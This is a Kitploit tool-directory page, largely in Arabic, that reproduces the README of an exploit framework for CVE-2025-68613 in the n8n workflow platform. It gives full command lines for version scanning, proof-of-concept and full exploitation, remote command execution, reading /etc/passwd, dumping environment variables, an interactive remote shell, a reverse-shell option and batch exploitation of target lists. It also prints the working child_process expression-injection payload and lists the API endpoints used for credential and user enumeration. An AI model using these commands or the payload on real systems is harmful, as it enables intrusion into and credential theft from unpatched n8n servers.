Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ تنفيذ التعليمات البرمجية عن بُعد في أتمتة سير العمل | Kitploit
أدوات/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
أداة الوصول عن بعد
تطوير الحمولات
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ تنفيذ التعليمات البرمجية عن بُعد في أتمتة سير العمل

عرض المستودع
5314منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

n8n God Mode Ultimate - ماسح CVE-2025-68613 وإطار استغلال

n8n God Mode Ultimate

أداة متقدمة لفحص واستغلال RCE لأتمتة سير عمل n8n

Python Version License CVE CVSS Score


🎯 نظرة عامة

n8n God Mode Ultimate هو إطار شامل لاختبار الأمان مصمم لاكتشاف والتحقق من CVE-2025-68613 في منصات أتمتة سير عمل n8n. تؤثر هذه الثغرة الحرجة لتنفيذ الأكواد عن بُعد (RCE) على إصدارات n8n من خلال حقن التعبيرات في سياقات تنفيذ سير العمل.

تفاصيل CVE-2025-68613

  • درجة CVSS: 10.0 (حرجة)
  • ناقل الهجوم: الشبكة
  • تعقيد الهجوم: منخفض
  • الصلاحيات المطلوبة: منخفضة (بيانات اعتماد صالحة)
  • تفاعل المستخدم: لا شيء
  • نوع الثغرة: حقن التعبيرات ← تنفيذ الأكواد عن بُعد

الإصدارات المتأثرة:

  • n8n >= 0.211.0 و < 1.120.4
  • n8n >= 1.121.0 و < 1.121.1

الإصدارات المصلَّحة:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ الميزات

🔍 الاكتشاف والفحص

  • اكتشاف ذكي للإصدار - استخراج إصدار n8n من البيانات الوصفية لصفحة تسجيل الدخول
  • فحص جماعي - مسح متزامن متعدد الخيوط للأهداف مع تتبع التقدم
  • أوضاع فحص متعددة:
    • --detect - اكتشاف الإصدار فقط (الأسرع وغير التدخلي)
    • --safe - فحص آمن للثغرة دون استغلال
    • --poc - التحقق من إثبات المفهوم لـ RCE
    • --exploit - وضع الاستغلال الكامل

💣 قدرات الاستغلال

  • 4 تقنيات استغلال:
    1. مشغّل الجدولة - سير عمل يُنفَّذ تلقائيًا (الأكثر موثوقية)
    2. مشغّل Webhook - تنفيذ يتم تشغيله عبر HTTP
    3. عقدة الكود - وصول مباشر إلى child_process
    4. حقن التعبيرات - تنفيذ تعبيرات يدويًا

🎮 ميزات الوضع الخارق (God Mode)

  • صدفة تفاعلية - صدفة بعيدة كاملة مع سجل أوامر
  • عمليات الملفات:
    • read <file> - قراءة ملفات بعيدة
    • write <file> <content> - كتابة ملفات على الهدف
  • استخراج بيئة التشغيل - تفريغ جميع متغيرات البيئة
  • معلومات النظام - تفاصيل نظام التشغيل، إعدادات الشبكة، معلومات العمليات
  • صدفة عكسية - توليد حمولة صدفة عكسية اختيارية
  • سجل الأوامر - تتبع سجل مدمج

📊 قدرات متقدمة

  • تعداد بيانات الاعتماد - استخراج بيانات الاعتماد المخزنة عبر API
  • تفريغ سير العمل - تصدير جميع سير العمل مع البيانات الوصفية
  • استخراج الإعدادات - تفريغ كامل لإعدادات النظام
  • تعداد المستخدمين - سرد جميع مستخدمي n8n
  • تحليل سجلات التنفيذ - تحليل مخرجات الأوامر من عمليات تنفيذ سير العمل
  • تنظيف تلقائي - حذف سير العمل اختياريًا بعد التنفيذ

🚀 التثبيت

المتطلبات الأساسية

# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

تثبيت التبعيات

# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

المتطلبات

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 الاستخدام

الاستخدام الأساسي

# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

عمليات الوضع الخارق (God Mode)

# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

الفحص الجماعي

# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

صيغة targets.txt:

http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

أوامر الصدفة التفاعلية

عند الدخول في وضع الصدفة (--shell):

n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ خيارات سطر الأوامر

خيارات الهدف

-u, --url URL             Target n8n URL
-l, --list FILE           File containing target URLs
-t, --threads NUM         Number of threads for batch scanning (default: 10)

المصادقة

-e, --email EMAIL         n8n user email
-p, --password PASS       n8n user password

أوضاع الفحص

--detect                  Version detection only (fastest)
--safe                    Safe check without exploitation
--poc                     RCE proof-of-concept
--exploit                 Full exploitation mode

الوضع الخارق (God Mode)

--god                     Enable god mode
--cmd COMMAND             Execute single command
--read-file PATH          Read remote file
--write-file PATH         Write remote file
--content DATA            Content for write operation
--dump-env                Extract all environment variables
--shell                   Interactive shell mode
--revshell HOST:PORT      Reverse shell payload

خيارات الاستغلال

--mode MODE               Exploit mode: schedule|webhook|code|expression (default: schedule)
--timeout SEC             Command timeout in seconds (default: 30)
--cleanup                 Delete workflows after execution
-k, --insecure           Disable SSL verification
-v, --verbose            Verbose output
-q, --quiet              Minimal output

🔬 التفاصيل التقنية

منهجية الاستغلال

1. مشغّل الجدولة (الموصى به)

ينشئ سير عمل بمشغّل مجدول يُنفَّذ تلقائيًا كل 3 ثوانٍ. الطريقة الأكثر موثوقية.

Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. مشغّل Webhook

ينشئ نقطة نهاية webhook عبر HTTP تنفّذ الأوامر عند تشغيلها.

3. عقدة الكود

يحقن الكود مباشرة في عقدة Code مع وصول إلى child_process.

4. حقن التعبيرات

تنفيذ يدوي عبر نظام تقييم التعبيرات في n8n.

اكتشاف الإصدار

يستخرج الإصدار من إعدادات Sentry المشفرة بـ base64 في صفحة تسجيل الدخول:

<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

نقاط نهاية API المستخدمة

  • /rest/login - المصادقة
  • /rest/workflows - عمليات CRUD لسير العمل
  • /rest/credentials - تعداد بيانات الاعتماد
  • /rest/executions - استرجاع سجلات التنفيذ
  • /rest/users - تعداد المستخدمين
  • /rest/settings - إعدادات النظام

📊 أمثلة على المخرجات

اكتشاف الإصدار

[*] n8n God Mode Ultimate v1.0.0
[*] Target: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VULNERABLE (< 1.120.4)

إثبات المفهوم لـ RCE

تنزيل الأداة